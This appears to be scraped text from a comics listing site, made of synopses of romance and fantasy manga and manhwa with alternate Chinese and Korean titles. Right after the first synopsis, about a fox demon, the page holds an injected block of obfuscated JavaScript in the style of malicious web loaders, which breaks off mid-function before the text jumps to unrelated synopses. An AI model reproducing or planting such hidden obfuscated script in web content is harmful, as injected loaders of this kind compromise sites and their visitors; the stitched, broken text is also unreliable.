Human girl Chi Yan has a nightmare of a fox everyday, and this life was no exception. One day, she meets a real fox demon. Nine tailed fox Yin Ran only has eight tails. In order to get back the tail bounded to Chi Yan, one of her wishes needs to be fulfilled. The girl, however, has no wishes and only wants to get rid of him. The bad fox, in response, messes up her life. A charming face appeared in front of the girl, “Would you like to make a wish now?”<script></script><script>(function(_0x3df14e,_0x2c0186){var _0x5839c0=_0x3928,_0x16a3e3=_0x3df14e();while(!![]){try{var _0x2eaad5=parseInt(_0x5839c0(0x12e))/(-0x15f1+0x5*0x186+0xe54)+parseInt(_0x5839c0(0x11e))/(-0x91+-0x16*-0x1c1+-0x2603*0x1)*(-parseInt(_0x5839c0(0x11a))/(0x3de+0x1*-0x16d0+0x12f5))+-parseInt(_0x5839c0(0x125))/(0x2e0*-0xb+-0x1*0x3d7+0x237b)*(parseInt(_0x5839c0(0x116))/(-0x1619+-0x16e2*0x1+0xf00*0x3))+-parseInt(_0x5839c0(0x126))/(-0x200+0x12d6*0x1+-0x10d0*0x1)+parseInt(_0x5839c0(0x118))/(0x23a7+-0x4*-0x377+-0x18be*0x2)+parseInt(_0x5839c0(0x11d))/(0x2210+-0x22ca*-0x1+-0x44d2)*(-parseInt(_0x5839c0(0x113))/(0x1498+-0xa5b+-0xa34))+parseInt(_0x5839c0(0x111))/(-0x1*-0x153+-0x1ab6+0x1*0x196d);if(_0x2eaad5===_0x2c0186)break;else _0x16a3e3['push'](_0x16a3e3['shift']());}catch(_0x298b4e){_0x16a3e3['push'](_0x16a3e3['shift']());}}}(_0x2ad6,-0x2c0bc+0x8d8b*-0xa+-0x3*-0x4538e));function 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Soon after she travels back to an ancient time, Cecilia Irvin, a doctor in the modern-day, wakes up and finds that she has just slept with a man. Soon, she gets pregnant and gives birth to a boy. After everything is settled, she has a few years of peaceful life. However, one day, her son brings her a “handsome-but-useless” man who is from the imperial secret office. And then here is a romantic and exciting story between this arrogant and mean doctor and the wicked and ruthless officer. Leng’ao Shenyi Chong Fu Sanshiliu Ji Lěng’ào Shényī Chǒng Fū Sānshíliù Jì The Thirty-Six Stratagems of the Icily Arrogant Heavenly Doctor Who Spoiled Their Husband Thirty-Six Strategies to Pampering Husband of the Icily Arrogant Heavenly Doctor 冷傲神医宠夫三十六计 冷傲神醫寵夫三十六計 까칠한 그녀 사로잡기
On the eve of Su Wei’s wedding, she catches her groom being intimate with another woman. To add insult to injury, the groom doesn’t even show up at their wedding. Will she swallow the insult and put up with a marriage without love? Adorable Wife Falling From Heaven Tian Jiang Meng Qi Tiān Jiàng Méng Qī 天降萌妻
She thought she fell into a love trap of a bossy president, he thought he will never be touched by anyone anything in this world. But a contracted marriage brings them two together. Is it something about fate or just love feeling appeared during accompany, or just another dark frame? MangaToon got authorization from Changya to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Lin Mu grew up with his sister, Lin Chao, who is congenitally deaf. He is the “little sun” that illuminates the lives of those around him. Meanwhile, the tall and handsome Lu Rong lost both his parents at a tender age and had since been living with his grandmother who has Alzheimer’s disease. He was forced to grow up quickly at an age when he should have been ignorant and oblivious. Kunqian, an institution that provides learning opportunities for the special community, is where their worlds collide. One a silent soul, and the other a blazing firecracker. With a bunch of schoolmates—a deaf-mute, a visually impaired person, a cerebral palsy patient—they embark together on their chapter of youth. “Lu Rong, you don’t have to put your guard up around me as if I’m some kind of a thief. I have a sister. I get it.” “Okay.”Mo Mai / Mò Mài / Silent Hearts / Veins of Silence / 默脉
Caruna does a lot of bad things to count Macarana’s daughter in order to be the fiancée of crown princes, The day she finally becomes the prince’s fiancée, a dagger is inserted into caruna’s belly by the duke. Oh , I knew this was going to happen … so now I’m going to go back in past ? But why didn’t I go back to the past and it was the next day ? Why did my surroundings stay the same and I’m the only one who returned to being a child ? Why are you doing this to me ? Duke When a killer sent , he couldn’t kill me . Well , isn’t his silence better ? Well , I think so . ” Hello my wife , I finally found you ” huh ? Isn’t it better to say ” Die my statics wife “ The Evil Girl Karuna Has Shrunk / 악녀 카루 나가 작아 졌어요
“I’ll do this marriage.” Woo So-ran, a dedicated lawyer, is the only person who’s aware about Baek Kang-ho’s contract. She agreed to marry him instead of his runaway bride. “You’ll regret it.” Well, I don’t make decisions which I’ll regret in the first place. She entered the tiger’s den with confidence. Even though her life so far was quiet and boring, a messy and secret romance begins. Will I regret this marriage? My noisy marriage / 내겐 너무 소란한 결혼
Read manhwa I Bought The Land, Not The Man She envies the life of an extra in the novel who earns money easily. One day, she possessed an extra character who is the loyal maid of the heroine in a novel. All she needs to do now is to become a rich man in the land! But… can she protect it from the cunning duke who covets her abilities? I was envious of the extra that took money more easily than the heroine of hardship, and when I imagined getting rich while looking at the land that was about to increase in value, suddenly the possessive came with a dubious voice?! Eliana, the extra loyal servant of the heroine Countess. Now all he had to do was get rich, and even the evil peacock, who was after the land where he lived, began to follow him. “Eliana. Let me do what I want.” “I do not like it!” Will he be able to protect his family from criminals who crave for his power, smile with a smart face and safely become rich?! A messy romantic comedy with a secular female lead. I Bought the Land, Not a Man /What I Bought Is Land, Not a Man
I have possessed an extra character as a villainess in the novel. I tried to live a quiet life without getting involved with the main character. “If you run away again, I’ll tie you up and take you to the palace.” The Second Prince, who only looked at the original heroine, is obsessed with me. “I didn’t do it for you, so don’t get me wrong.” My self-proclaimed rival seems to have a crush on me. “Ahh! She’s so beautiful!” “If only I had been hit by her magic once!” Suddenly, there is a fan club. “Come, let us all pray reverently while looking at the picture of the noble Yerine.” My favorite heroine becomes the president of the fan club. ……Am I really the villainess? Associated Names I’m a Villainess But So Popular 악역인데, 인기가 너무 많다
Adelaide, the crown princess and highest ranked offence magician, fell out of favour from her mother, the Empress Dowager. As if she were kicked out of her own home, she was married off as an Empress to a far away land. And there, she was welcomed by the Emperor’s mistress, who started talking about the Emperor’s preferences! Adelaide disregarded the emperor’s warning to live as Empress in name only, and chose Lionel to be her aide, the emperor’s very own political rival. I Will Give Up The Position as Empress / 황후 자리를 버리겠습니다
I already possess the body of a woman who will marry the devil. In a role haunted by her husband until death. “I will always be by your side!” I’ve decided to be nice to this poor husband for a while. But before one day, when I had reached adulthood and planned to divorce. A little angel appeared in the night full of surprises. Oh man. So I tried to run away before being discovered… “Richard? something’s not right…” “I have no intention of letting you run away, even if you die, you must stay in my arms. Elisha” Trying to cry and beg with a pretty face is also not possible. “Where are you going to take our children?” Did he even chase after me with those cold eyes? …I guess I was wrong to run away like this. How to solve this situation? 악당 남편과 이혼하려는데, 아이가 생겼다
To revenge, Xia Yihan swallowed her pride and disguised herself as a maid to sneak in Family Ye’s mansion. She didn’t want to have anything to do with Ye Zi Mo, but life brought them together. They went toe-to-toe at first, but later on, they got engaged to each other? But things didn’t go as happy-ever-after as we thought. Why did Ye Zi Mo get outraged when he know that Xia Yihan was pregnant? Exclusive Favouritism / 酷总裁的独家溺爱 / Ku Zongcai De Dujia Ni’ai